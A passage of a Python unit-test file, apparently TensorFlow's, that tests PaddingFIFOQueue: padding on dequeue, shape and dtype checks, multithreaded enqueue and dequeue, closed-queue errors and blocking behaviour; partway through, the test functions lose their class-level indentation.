    with self.cached_session() as sess:
      q = data_flow_ops.PaddingFIFOQueue(
          10, (dtypes_lib.string, dtypes_lib.int32),
          shapes=((None,), (1, None)))
      str_elems = [["a"], ["ab"], ["abc"], ["abc", "d"], ["abc", "d", "e"],
                   ["abc", "d", "e", "f"]]
      int_elems = [[[1]], [[2]], [[3]], [[1, 2]], [[1, 2, 3]], [[1, 2, 3, 4]]]
      enqueue_ops = [q.enqueue((str_elems[i], int_elems[i])) for i in range(6)]
      dequeued_t = q.dequeue_many(5)
      dequeued_single_t = q.dequeue()

      for enqueue_op in enqueue_ops:
        enqueue_op.run()

      string_val, int_val = sess.run(dequeued_t)

      self.assertAllEqual([[b"a", b"", b""], [b"ab", b"", b""],
                           [b"abc", b"", b""], [b"abc", b"d", b""],
                           [b"abc", b"d", b"e"]], string_val)
      self.assertAllEqual([[[1, 0, 0]], [[2, 0, 0]], [[3, 0, 0]], [[1, 2, 0]],
                           [[1, 2, 3]]], int_val)
      self.assertTrue(
          tensor_shape.TensorShape(string_val.shape).is_compatible_with(
              dequeued_t[0].get_shape()))
      self.assertTrue(
          tensor_shape.TensorShape(int_val.shape).is_compatible_with(dequeued_t[
              1].get_shape()))

      string_val, int_val = sess.run(dequeued_single_t)
      self.assertAllEqual([b"abc", b"d", b"e", b"f"], string_val)
      self.assertAllEqual([[1, 2, 3, 4]], int_val)
      self.assertTrue(
          tensor_shape.TensorShape(string_val.shape).is_compatible_with(
              dequeued_single_t[0].get_shape()))
      self.assertTrue(
          tensor_shape.TensorShape(int_val.shape).is_compatible_with(
              dequeued_single_t[1].get_shape()))

  def testMultiDequeueUpToPartiallyKnownShapesAndVariableInputNoBlocking(self):
    """dequeue_up_to shows the same padding behavior as dequeue_many."""
    with self.cached_session() as sess:
      q = data_flow_ops.PaddingFIFOQueue(
          10, (dtypes_lib.string, dtypes_lib.int32),
          shapes=((None,), (1, None)))
      str_elems = [["a"], ["ab"], ["abc"], ["abc", "d"], ["abc", "d", "e"],
                   ["abc", "d", "e", "f"]]
      int_elems = [[[1]], [[2]], [[3]], [[1, 2]], [[1, 2, 3]], [[1, 2, 3, 4]]]
      enqueue_ops = [q.enqueue((str_elems[i], int_elems[i])) for i in range(6)]
      dequeued_t = q.dequeue_up_to(5)
      dequeued_single_t = q.dequeue()

      for enqueue_op in enqueue_ops:
        enqueue_op.run()

      string_val, int_val = sess.run(dequeued_t)

      self.assertAllEqual([[b"a", b"", b""], [b"ab", b"", b""],
                           [b"abc", b"", b""], [b"abc", b"d", b""],
                           [b"abc", b"d", b"e"]], string_val)
      self.assertAllEqual([[[1, 0, 0]], [[2, 0, 0]], [[3, 0, 0]], [[1, 2, 0]],
                           [[1, 2, 3]]], int_val)
      self.assertTrue(
          tensor_shape.TensorShape(string_val.shape).is_compatible_with(
              dequeued_t[0].get_shape()))
      self.assertTrue(
          tensor_shape.TensorShape(int_val.shape).is_compatible_with(dequeued_t[
              1].get_shape()))

      string_val, int_val = sess.run(dequeued_single_t)
      self.assertAllEqual([b"abc", b"d", b"e", b"f"], string_val)
      self.assertAllEqual([[1, 2, 3, 4]], int_val)
      self.assertTrue(
          tensor_shape.TensorShape(string_val.shape).is_compatible_with(
              dequeued_single_t[0].get_shape()))
      self.assertTrue(
          tensor_shape.TensorShape(int_val.shape).is_compatible_with(
              dequeued_single_t[1].get_shape()))
  def testHighDimension(self):
    """Rank-4 elements round-trip unchanged through the queue."""
    with self.cached_session():
      q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.int32, ((4, 4, 4, 4),))
      elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
      enqueue_op = q.enqueue_many((elems,))
      dequeued_t = q.dequeue_many(10)

      enqueue_op.run()
      self.assertAllEqual(dequeued_t.eval(), elems)

  def testPartiallyKnownHighDimension(self):
    """Rank-4 elements round-trip even with alternating unknown dimensions."""
    with self.cached_session():
      q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.int32, (
          (4, None, 4, None),))
      elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
      enqueue_op = q.enqueue_many((elems,))
      dequeued_t = q.dequeue_many(10)

      enqueue_op.run()
      self.assertAllEqual(dequeued_t.eval(), elems)
  def testEnqueueWrongShape(self):
    """Shape violations are rejected at graph-construction time."""
    q = data_flow_ops.PaddingFIFOQueue(10, (dtypes_lib.int32, dtypes_lib.int32),
                                       ((), (2,)))

    with self.assertRaises(ValueError):
      q.enqueue(([1, 2], [2, 2]))

    with self.assertRaises(ValueError):
      q.enqueue_many((7, [[1, 2], [3, 4], [5, 6]]))

  def testBatchSizeMismatch(self):
    """enqueue_many requires the same leading batch size on every component."""
    q = data_flow_ops.PaddingFIFOQueue(10, (dtypes_lib.int32, dtypes_lib.int32,
                                            dtypes_lib.int32), ((), (), ()))

    with self.assertRaises(ValueError):
      q.enqueue_many(([1, 2, 3], [1, 2], [1, 2, 3]))

    with self.assertRaises(ValueError):
      q.enqueue_many(
          ([1, 2, 3], [1, 2], array_ops.placeholder(dtypes_lib.int32)))

    with self.assertRaises(ValueError):
      q.enqueue_many(
          (array_ops.placeholder(dtypes_lib.int32), [1, 2], [1, 2, 3]))

  def testEnqueueManyEmptyTypeConversion(self):
    """Empty Python lists are converted to the queue's declared dtypes."""
    q = data_flow_ops.PaddingFIFOQueue(10,
                                       (dtypes_lib.int32, dtypes_lib.float32), (
                                           (), ()))
    enq = q.enqueue_many(([], []))
    self.assertEqual(dtypes_lib.int32, enq.inputs[1].dtype)
    self.assertEqual(dtypes_lib.float32, enq.inputs[2].dtype)
  def testEnqueueWrongType(self):
    """dtype mismatches against the queue's component_types raise ValueError."""
    q = data_flow_ops.PaddingFIFOQueue(10,
                                       (dtypes_lib.int32, dtypes_lib.float32), (
                                           (), ()))

    with self.assertRaises(ValueError):
      q.enqueue((array_ops.placeholder(dtypes_lib.int32),
                 array_ops.placeholder(dtypes_lib.int32)))

    with self.assertRaises(ValueError):
      q.enqueue_many((array_ops.placeholder(dtypes_lib.int32),
                      array_ops.placeholder(dtypes_lib.int32)))

  def testEnqueueWrongPartiallyKnownShapeAtRuntime(self):
    """A fed value violating the known part of a (None, 3) shape fails at run time."""
    with self.cached_session() as sess:
      # First dimension of second component is unknown, second
      # dimension must be 3.
      q = data_flow_ops.PaddingFIFOQueue(10,
                                         (dtypes_lib.int32, dtypes_lib.int32), (
                                             (2, 2), (None, 3)))
      elems_ok = np.array([1] * 4).reshape((2, 2)).astype(np.int32)
      elems_bad = array_ops.placeholder(dtypes_lib.int32)
      enqueue_op = q.enqueue((elems_ok, elems_bad))
      with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
                                   r"Expected \[\?,3\], got \[3,4\]"):
        sess.run([enqueue_op],
                 feed_dict={elems_bad: np.array([1] * 12).reshape((3, 4))})
  def testEnqueueDequeueManyWrongPartiallyKnownShape(self):
    """Batched enqueue with a shape violating (None, 3) fails at run time."""
    with self.cached_session() as sess:
      # First dimension of second component is unknown, second
      # dimension must be 3.
      q = data_flow_ops.PaddingFIFOQueue(10,
                                         (dtypes_lib.int32, dtypes_lib.int32), (
                                             (2, 2), (None, 3)))
      elems_ok = np.array([1] * 8).reshape((2, 2, 2)).astype(np.int32)
      elems_bad = array_ops.placeholder(dtypes_lib.int32)
      enqueue_op = q.enqueue_many((elems_ok, elems_bad))
      dequeued_t = q.dequeue_many(2)
      with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
                                   "Shape mismatch in tuple component 1. "
                                   r"Expected \[2,\?,3\], got \[2,3,4\]"):
        sess.run([enqueue_op],
                 feed_dict={elems_bad: np.array([1] * 24).reshape((2, 3, 4))})
        self.evaluate(dequeued_t)
  def testParallelEnqueueMany(self):
    """Ten threads each enqueue a 100-element batch; one dequeue drains all 1000."""
    with self.cached_session() as sess:
      q = data_flow_ops.PaddingFIFOQueue(1000, dtypes_lib.float32, shapes=((),))
      elems = [10.0 * x for x in range(100)]
      enqueue_op = q.enqueue_many((elems,))
      dequeued_t = q.dequeue_many(1000)

      # Enqueue 100 items in parallel on 10 threads.
      def enqueue():
        sess.run(enqueue_op)

      threads = [self.checkedThread(target=enqueue) for _ in range(10)]
      for thread in threads:
        thread.start()
      for thread in threads:
        thread.join()

      self.assertItemsEqual(dequeued_t.eval(), elems * 10)

  def testParallelDequeueMany(self):
    """Ten threads each dequeue a 100-element batch; union equals the input."""
    with self.cached_session() as sess:
      q = data_flow_ops.PaddingFIFOQueue(1000, dtypes_lib.float32, shapes=((),))
      elems = [10.0 * x for x in range(1000)]
      enqueue_op = q.enqueue_many((elems,))
      dequeued_t = q.dequeue_many(100)

      enqueue_op.run()

      # Dequeue 100 items in parallel on 10 threads.
      dequeued_elems = []

      def dequeue():
        dequeued_elems.extend(sess.run(dequeued_t))

      threads = [self.checkedThread(target=dequeue) for _ in range(10)]
      for thread in threads:
        thread.start()
      for thread in threads:
        thread.join()
      self.assertItemsEqual(elems, dequeued_elems)

  def testParallelDequeueUpTo(self):
    """dequeue_up_to from a closed queue drains everything across 10 threads."""
    with self.cached_session() as sess:
      q = data_flow_ops.PaddingFIFOQueue(1000, dtypes_lib.float32, shapes=((),))
      elems = [10.0 * x for x in range(1000)]
      enqueue_op = q.enqueue_many((elems,))
      close_op = q.close()
      dequeued_t = q.dequeue_up_to(101)

      enqueue_op.run()
      close_op.run()

      # Dequeue up to 101 items in parallel on 10 threads, from closed queue.
      dequeued_elems = []

      def dequeue():
        dequeued_elems.extend(sess.run(dequeued_t))

      threads = [self.checkedThread(target=dequeue) for _ in range(10)]
      for thread in threads:
        thread.start()
      for thread in threads:
        thread.join()
      self.assertItemsEqual(elems, dequeued_elems)
  def testParallelEnqueueAndDequeue(self):
    """Producers and consumers run concurrently on a nearly-full queue."""
    with self.cached_session() as sess:
      q = data_flow_ops.PaddingFIFOQueue(50, dtypes_lib.float32, shapes=((),))
      initial_elements = [10.0] * 49
      q.enqueue_many((initial_elements,)).run()

      enqueue_op = q.enqueue((20.0,))
      dequeued_t = q.dequeue()

      def enqueue():
        for _ in xrange(100):
          sess.run(enqueue_op)

      def dequeue():
        for _ in xrange(100):
          self.assertTrue(sess.run(dequeued_t) in (10.0, 20.0))

      enqueue_threads = [self.checkedThread(target=enqueue) for _ in range(10)]
      dequeue_threads = [self.checkedThread(target=dequeue) for _ in range(10)]
      for enqueue_thread in enqueue_threads:
        enqueue_thread.start()
      for dequeue_thread in dequeue_threads:
        dequeue_thread.start()
      for enqueue_thread in enqueue_threads:
        enqueue_thread.join()
      for dequeue_thread in dequeue_threads:
        dequeue_thread.join()

      # Dequeue the initial count of elements to clean up.
      cleanup_elems = q.dequeue_many(49).eval()
      for elem in cleanup_elems:
        self.assertTrue(elem in (10.0, 20.0))
  def testMixtureOfEnqueueAndEnqueueMany(self):
    """Randomly interleaved enqueue/enqueue_many still yields 0..249 in order."""
    with self.cached_session() as sess:
      q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.int32, shapes=((),))
      enqueue_placeholder = array_ops.placeholder(dtypes_lib.int32, shape=())
      enqueue_op = q.enqueue((enqueue_placeholder,))
      enqueuemany_placeholder = array_ops.placeholder(
          dtypes_lib.int32, shape=(None,))
      enqueuemany_op = q.enqueue_many((enqueuemany_placeholder,))

      dequeued_t = q.dequeue()
      close_op = q.close()

      def dequeue():
        for i in xrange(250):
          self.assertEqual(i, sess.run(dequeued_t))

      dequeue_thread = self.checkedThread(target=dequeue)
      dequeue_thread.start()

      elements_enqueued = 0
      while elements_enqueued < 250:
        # With equal probability, run Enqueue or enqueue_many.
        if random.random() > 0.5:
          enqueue_op.run({enqueue_placeholder: elements_enqueued})
          elements_enqueued += 1
        else:
          count = random.randint(0, min(20, 250 - elements_enqueued))
          range_to_enqueue = np.arange(
              elements_enqueued, elements_enqueued + count, dtype=np.int32)
          enqueuemany_op.run({enqueuemany_placeholder: range_to_enqueue})
          elements_enqueued += count

      close_op.run()
      dequeue_thread.join()
      self.assertEqual(0, q.size().eval())
  def testMixtureOfDequeueAndDequeueMany(self):
    """Randomly interleaved dequeue/dequeue_many still consumes 0..249 in order."""
    with self.cached_session() as sess:
      q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.int32, shapes=((),))
      enqueue_op = q.enqueue_many((np.arange(250, dtype=np.int32),))
      dequeued_t = q.dequeue()
      count_placeholder = array_ops.placeholder(dtypes_lib.int32, shape=())
      dequeuemany_t = q.dequeue_many(count_placeholder)

      def enqueue():
        sess.run(enqueue_op)

      enqueue_thread = self.checkedThread(target=enqueue)
      enqueue_thread.start()

      elements_dequeued = 0
      while elements_dequeued < 250:
        # With equal probability, run Dequeue or dequeue_many.
        if random.random() > 0.5:
          self.assertEqual(elements_dequeued, self.evaluate(dequeued_t))
          elements_dequeued += 1
        else:
          count = random.randint(0, min(20, 250 - elements_dequeued))
          expected_range = np.arange(
              elements_dequeued, elements_dequeued + count, dtype=np.int32)
          self.assertAllEqual(expected_range,
                              dequeuemany_t.eval({
                                  count_placeholder: count
                              }))
          elements_dequeued += count

      q.close().run()
      enqueue_thread.join()
      self.assertEqual(0, q.size().eval())
def testBlockingDequeueMany(self):
  """dequeue_many(4) on an empty queue blocks until elements arrive."""
  with self.cached_session() as sess:
    q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
    elems = [10.0, 20.0, 30.0, 40.0]
    enqueue_op = q.enqueue_many((elems,))
    dequeued_t = q.dequeue_many(4)

    dequeued_elems = []

    def enqueue():
      # The enqueue_op should run after the dequeue op has blocked.
      # TODO(mrry): Figure out how to do this without sleeping.
      time.sleep(0.1)
      sess.run(enqueue_op)

    def dequeue():
      dequeued_elems.extend(sess.run(dequeued_t).tolist())

    enqueue_thread = self.checkedThread(target=enqueue)
    dequeue_thread = self.checkedThread(target=dequeue)
    enqueue_thread.start()
    dequeue_thread.start()
    enqueue_thread.join()
    dequeue_thread.join()

    self.assertAllEqual(elems, dequeued_elems)
def testBlockingDequeueUpTo(self):
  """dequeue_up_to(4) on an empty queue blocks until elements arrive."""
  with self.cached_session() as sess:
    q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
    elems = [10.0, 20.0, 30.0, 40.0]
    enqueue_op = q.enqueue_many((elems,))
    dequeued_t = q.dequeue_up_to(4)

    dequeued_elems = []

    def enqueue():
      # The enqueue_op should run after the dequeue op has blocked.
      # TODO(mrry): Figure out how to do this without sleeping.
      time.sleep(0.1)
      sess.run(enqueue_op)

    def dequeue():
      dequeued_elems.extend(sess.run(dequeued_t).tolist())

    enqueue_thread = self.checkedThread(target=enqueue)
    dequeue_thread = self.checkedThread(target=dequeue)
    enqueue_thread.start()
    dequeue_thread.start()
    enqueue_thread.join()
    dequeue_thread.join()

    self.assertAllEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
  """The batch size of dequeue_many may itself be a dequeued tensor."""
  with self.cached_session():
    # Define a first queue that contains integer counts.
    dequeue_counts = [random.randint(1, 10) for _ in range(100)]
    count_q = data_flow_ops.PaddingFIFOQueue(100, dtypes_lib.int32, ((),))
    enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
    total_count = sum(dequeue_counts)

    # Define a second queue that contains total_count elements.
    elems = [random.randint(0, 100) for _ in range(total_count)]
    q = data_flow_ops.PaddingFIFOQueue(total_count, dtypes_lib.int32, ((),))
    enqueue_elems_op = q.enqueue_many((elems,))

    # Define a subgraph that first dequeues a count, then DequeuesMany
    # that number of elements.
    dequeued_t = q.dequeue_many(count_q.dequeue())

    enqueue_counts_op.run()
    enqueue_elems_op.run()

    dequeued_elems = []
    for _ in dequeue_counts:
      dequeued_elems.extend(dequeued_t.eval())
    self.assertEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
  """Draining a closed queue succeeds, then raises OutOfRangeError."""
  with self.cached_session():
    q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
    elems = [10.0, 20.0, 30.0, 40.0]
    enqueue_op = q.enqueue_many((elems,))
    close_op = q.close()
    dequeued_t = q.dequeue()

    enqueue_op.run()
    close_op.run()
    for elem in elems:
      self.assertEqual([elem], self.evaluate(dequeued_t))

    # Expect the operation to fail due to the queue being closed.
    with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
                                 "is closed and has insufficient"):
      self.evaluate(dequeued_t)
def testBlockingDequeueFromClosedQueue(self):
  """A blocked dequeue drains remaining elements after close, then fails."""
  with self.cached_session() as sess:
    q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
    elems = [10.0, 20.0, 30.0, 40.0]
    enqueue_op = q.enqueue_many((elems,))
    close_op = q.close()
    dequeued_t = q.dequeue()

    enqueue_op.run()

    def dequeue():
      for elem in elems:
        self.assertEqual([elem], sess.run(dequeued_t))
      # Expect the operation to fail due to the queue being closed.
      with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
                                   "is closed and has insufficient"):
        sess.run(dequeued_t)

    dequeue_thread = self.checkedThread(target=dequeue)
    dequeue_thread.start()
    # The close_op should run after the dequeue_thread has blocked.
    # TODO(mrry): Figure out how to do this without sleeping.
    time.sleep(0.1)
    close_op.run()
    dequeue_thread.join()
def testDequeueUpToFromClosedQueueReturnsRemainder(self):
  """dequeue_up_to returns the short remainder once the queue is closed."""
  with self.cached_session() as sess:
    q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
    elems = [10.0, 20.0, 30.0, 40.0]
    enqueue_op = q.enqueue_many((elems,))
    close_op = q.close()
    dequeued_t = q.dequeue_up_to(3)

    enqueue_op.run()

    def dequeue():
      # First call gets a full batch of 3; second gets the remaining 1.
      self.assertAllEqual(elems[:3], sess.run(dequeued_t))
      self.assertAllEqual(elems[3:], sess.run(dequeued_t))

    dequeue_thread = self.checkedThread(target=dequeue)
    dequeue_thread.start()
    # The close_op should run after the dequeue_thread has blocked.
    # TODO(mrry): Figure out how to do this without sleeping.
    time.sleep(0.1)
    close_op.run()
    dequeue_thread.join()
def testBlockingDequeueFromClosedEmptyQueue(self):
  """A blocked dequeue on an empty queue fails once the queue closes."""
  with self.cached_session() as sess:
    q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
    close_op = q.close()
    dequeued_t = q.dequeue()

    def dequeue():
      # Expect the operation to fail due to the queue being closed.
      with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
                                   "is closed and has insufficient"):
        sess.run(dequeued_t)

    dequeue_thread = self.checkedThread(target=dequeue)
    dequeue_thread.start()
    # The close_op should run after the dequeue_thread has blocked.
    # TODO(mrry): Figure out how to do this without sleeping.
    time.sleep(0.1)
    close_op.run()
    dequeue_thread.join()
def testBlockingDequeueManyFromClosedQueue(self):
  """dequeue_many succeeds with a full batch, then fails after close."""
  with self.cached_session() as sess:
    q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
    elems = [10.0, 20.0, 30.0, 40.0]
    enqueue_op = q.enqueue_many((elems,))
    close_op = q.close()
    dequeued_t = q.dequeue_many(4)

    enqueue_op.run()

    def dequeue():
      self.assertAllEqual(elems, sess.run(dequeued_t))
      # Expect the operation to fail due to the queue being closed.
      with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
                                   "is closed and has insufficient"):
        sess.run(dequeued_t)

    dequeue_thread = self.checkedThread(target=dequeue)
    dequeue_thread.start()
    # The close_op should run after the dequeue_thread has blocked.
    # TODO(mrry): Figure out how to do this without sleeping.
    time.sleep(0.1)
    close_op.run()
    dequeue_thread.join()
def testBlockingDequeueManyButNotAllFromClosedQueue(self):
  """dequeue_many(3) takes 3 of 4 elements; the retry fails after close."""
  with self.cached_session() as sess:
    q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
    elems = [10.0, 20.0, 30.0, 40.0]
    enqueue_op = q.enqueue_many((elems,))
    close_op = q.close()
    dequeued_t = q.dequeue_many(3)

    enqueue_op.run()

    def dequeue():
      self.assertAllEqual(elems[:3], sess.run(dequeued_t))
      # Only one element remains, so a batch of 3 cannot be satisfied.
      # Expect the operation to fail due to the queue being closed.
      with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
                                   "is closed and has insufficient"):
        sess.run(dequeued_t)

    dequeue_thread = self.checkedThread(target=dequeue)
    dequeue_thread.start()
    # The close_op should run after the dequeue_thread has blocked.
    # TODO(mrry): Figure out how to do this without sleeping.
    time.sleep(0.1)
    close_op.run()
    dequeue_thread.join()
def testEnqueueManyLargerThanCapacityWithConcurrentDequeueMany(self):
  """An enqueue_many of 4 into a capacity-4 queue completes as dequeues
  free space; after close the leftover element is still dequeueable."""
  with self.cached_session() as sess:
    q = data_flow_ops.PaddingFIFOQueue(4, dtypes_lib.float32, ((),))
    elems = [10.0, 20.0, 30.0, 40.0]
    enqueue_op = q.enqueue_many((elems,))
    close_op = q.close()
    dequeued_t = q.dequeue_many(3)
    cleanup_dequeue_t = q.dequeue()

    def enqueue():
      sess.run(enqueue_op)

    def dequeue():
      self.assertAllEqual(elems[0:3], sess.run(dequeued_t))
      with self.assertRaises(errors_impl.OutOfRangeError):
        sess.run(dequeued_t)
      # The single remaining element is recoverable with a plain dequeue.
      self.assertEqual(elems[3], sess.run(cleanup_dequeue_t))

    def close():
      sess.run(close_op)

    enqueue_thread = self.checkedThread(target=enqueue)
    enqueue_thread.start()

    dequeue_thread = self.checkedThread(target=dequeue)
    dequeue_thread.start()
    # The close_op should run after the dequeue_thread has blocked.
    # TODO(mrry): Figure out how to do this without sleeping.
    time.sleep(0.1)

    close_thread = self.checkedThread(target=close)
    close_thread.start()

    enqueue_thread.join()
    dequeue_thread.join()
    close_thread.join()
def testClosedBlockingDequeueManyRestoresPartialBatch(self):
  """A failed dequeue_many restores its partially-taken batch in order."""
  with self.cached_session() as sess:
    q = data_flow_ops.PaddingFIFOQueue(4, (dtypes_lib.float32,
                                           dtypes_lib.float32), ((), ()))
    elems_a = [1.0, 2.0, 3.0]
    elems_b = [10.0, 20.0, 30.0]
    enqueue_op = q.enqueue_many((elems_a, elems_b))
    dequeued_a_t, dequeued_b_t = q.dequeue_many(4)
    cleanup_dequeue_a_t, cleanup_dequeue_b_t = q.dequeue()
    close_op = q.close()

    enqueue_op.run()

    def dequeue():
      # Only 3 of the requested 4 elements exist, so this must fail.
      with self.assertRaises(errors_impl.OutOfRangeError):
        sess.run([dequeued_a_t, dequeued_b_t])

    dequeue_thread = self.checkedThread(target=dequeue)
    dequeue_thread.start()
    # The close_op should run after the dequeue_thread has blocked.
    # TODO(mrry): Figure out how to do this without sleeping.
    time.sleep(0.1)

    close_op.run()
    dequeue_thread.join()

    # Test that the elements in the partially-dequeued batch are
    # restored in the correct order.
    for elem_a, elem_b in zip(elems_a, elems_b):
      val_a, val_b = sess.run([cleanup_dequeue_a_t, cleanup_dequeue_b_t])
      self.assertEqual(elem_a, val_a)
      self.assertEqual(elem_b, val_b)
    self.assertEqual(0, q.size().eval())
def testBlockingDequeueManyFromClosedEmptyQueue(self):
  """A blocked dequeue_many on an empty queue fails when it closes."""
  with self.cached_session() as sess:
    q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
    close_op = q.close()
    dequeued_t = q.dequeue_many(4)

    def dequeue():
      # Expect the operation to fail due to the queue being closed.
      with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
                                   "is closed and has insufficient"):
        sess.run(dequeued_t)

    dequeue_thread = self.checkedThread(target=dequeue)
    dequeue_thread.start()
    # The close_op should run after the dequeue_thread has blocked.
    # TODO(mrry): Figure out how to do this without sleeping.
    time.sleep(0.1)
    close_op.run()
    dequeue_thread.join()
def testBlockingDequeueUpToFromClosedEmptyQueue(self):
  """A blocked dequeue_up_to on an empty queue fails when it closes."""
  with self.cached_session() as sess:
    q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
    close_op = q.close()
    dequeued_t = q.dequeue_up_to(4)

    def dequeue():
      # Expect the operation to fail due to the queue being closed.
      with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
                                   "is closed and has insufficient"):
        sess.run(dequeued_t)

    dequeue_thread = self.checkedThread(target=dequeue)
    dequeue_thread.start()
    # The close_op should run after the dequeue_thread has blocked.
    # TODO(mrry): Figure out how to do this without sleeping.
    time.sleep(0.1)
    close_op.run()
    dequeue_thread.join()
def testEnqueueToClosedQueue(self):
  """Enqueuing to a closed queue raises CancelledError."""
  with self.cached_session():
    q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
    enqueue_op = q.enqueue((10.0,))
    close_op = q.close()

    enqueue_op.run()
    close_op.run()

    # Expect the operation to fail due to the queue being closed.
    with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
      enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
  """enqueue_many to a closed queue raises CancelledError."""
  with self.cached_session():
    q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
    elems = [10.0, 20.0, 30.0, 40.0]
    enqueue_op = q.enqueue_many((elems,))
    close_op = q.close()

    enqueue_op.run()
    close_op.run()

    # Expect the operation to fail due to the queue being closed.
    with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
      enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
  """An enqueue on a full queue blocks until an element is dequeued."""
  with self.cached_session() as sess:
    q = data_flow_ops.PaddingFIFOQueue(4, dtypes_lib.float32, ((),))
    elems = [10.0, 20.0, 30.0, 40.0]
    enqueue_op = q.enqueue_many((elems,))
    blocking_enqueue_op = q.enqueue((50.0,))
    dequeued_t = q.dequeue()

    enqueue_op.run()

    def blocking_enqueue():
      sess.run(blocking_enqueue_op)

    thread = self.checkedThread(target=blocking_enqueue)
    thread.start()
    # The dequeue ops should run after the blocking_enqueue_op has blocked.
    # TODO(mrry): Figure out how to do this without sleeping.
    time.sleep(0.1)
    for elem in elems:
      self.assertEqual([elem], self.evaluate(dequeued_t))
    # The blocked enqueue's value comes out last, preserving FIFO order.
    self.assertEqual([50.0], self.evaluate(dequeued_t))
    thread.join()
def testBlockingEnqueueManyToFullQueue(self):
  """An enqueue_many on a full queue blocks until space frees up."""
  with self.cached_session() as sess:
    q = data_flow_ops.PaddingFIFOQueue(4, dtypes_lib.float32, ((),))
    elems = [10.0, 20.0, 30.0, 40.0]
    enqueue_op = q.enqueue_many((elems,))
    blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
    dequeued_t = q.dequeue()

    enqueue_op.run()

    def blocking_enqueue():
      sess.run(blocking_enqueue_op)

    thread = self.checkedThread(target=blocking_enqueue)
    thread.start()
    # The dequeue ops should run after the blocking_enqueue_op has blocked.
    # TODO(mrry): Figure out how to do this without sleeping.
    time.sleep(0.1)
    for elem in elems:
      self.assertEqual([elem], self.evaluate(dequeued_t))
      time.sleep(0.01)
    self.assertEqual([50.0], self.evaluate(dequeued_t))
    self.assertEqual([60.0], self.evaluate(dequeued_t))

    # Make sure the thread finishes before exiting.
    thread.join()
def testBlockingEnqueueBeforeClose(self):
  """An enqueue blocked before close still completes once space frees."""
  with self.cached_session() as sess:
    q = data_flow_ops.PaddingFIFOQueue(4, dtypes_lib.float32, ((),))
    elems = [10.0, 20.0, 30.0, 40.0]
    enqueue_op = q.enqueue_many((elems,))
    blocking_enqueue_op = q.enqueue((50.0,))
    close_op = q.close()
    dequeued_t = q.dequeue()

    enqueue_op.run()

    def blocking_enqueue():
      # Expect the operation to succeed once the dequeue op runs.
      sess.run(blocking_enqueue_op)

    enqueue_thread = self.checkedThread(target=blocking_enqueue)
    enqueue_thread.start()
    # The close_op should run after the blocking_enqueue_op has blocked.
    # TODO(mrry): Figure out how to do this without sleeping.
    time.sleep(0.1)

    def close():
      sess.run(close_op)

    close_thread = self.checkedThread(target=close)
    close_thread.start()

    # The dequeue will unblock both threads.
    self.assertEqual(10.0, self.evaluate(dequeued_t))
    enqueue_thread.join()
    close_thread.join()

    for elem in [20.0, 30.0, 40.0, 50.0]:
      self.assertEqual(elem, self.evaluate(dequeued_t))
    self.assertEqual(0, q.size().eval())
def testBlockingEnqueueManyBeforeClose(self):
  """An enqueue_many blocked before close still completes afterwards."""
  with self.cached_session() as sess:
    q = data_flow_ops.PaddingFIFOQueue(4, dtypes_lib.float32, ((),))
    elems = [10.0, 20.0, 30.0]
    enqueue_op = q.enqueue_many((elems,))
    blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
    close_op = q.close()
    dequeued_t = q.dequeue()

    enqueue_op.run()

    def blocking_enqueue():
      sess.run(blocking_enqueue_op)

    enqueue_thread = self.checkedThread(target=blocking_enqueue)
    enqueue_thread.start()
    # The close_op should run after the blocking_enqueue_op has blocked.
    # TODO(mrry): Figure out how to do this without sleeping.
    time.sleep(0.1)

    def close():
      sess.run(close_op)

    close_thread = self.checkedThread(target=close)
    close_thread.start()

    # The dequeue will unblock both threads.
    self.assertEqual(10.0, self.evaluate(dequeued_t))
    enqueue_thread.join()
    close_thread.join()
    for elem in [20.0, 30.0, 50.0, 60.0]:
      self.assertEqual(elem, self.evaluate(dequeued_t))
def testDoesNotLoseValue(self):
  """Repeatedly evaluating size() must not consume the queued element."""
  with self.cached_session():
    queue = data_flow_ops.PaddingFIFOQueue(1, dtypes_lib.float32, ((),))
    size_op = queue.size()
    queue.enqueue((10.0,)).run()
    for _ in range(500):
      self.assertEqual(size_op.eval(), [1])
def testSharedQueueSameSession(self):
  """Two queue handles with the same shared_name act on one queue."""
  with self.cached_session():
    q1 = data_flow_ops.PaddingFIFOQueue(
        1, dtypes_lib.float32, ((),), shared_name="shared_queue")
    q1.enqueue((10.0,)).run()

    # Second handle to the same underlying shared queue.
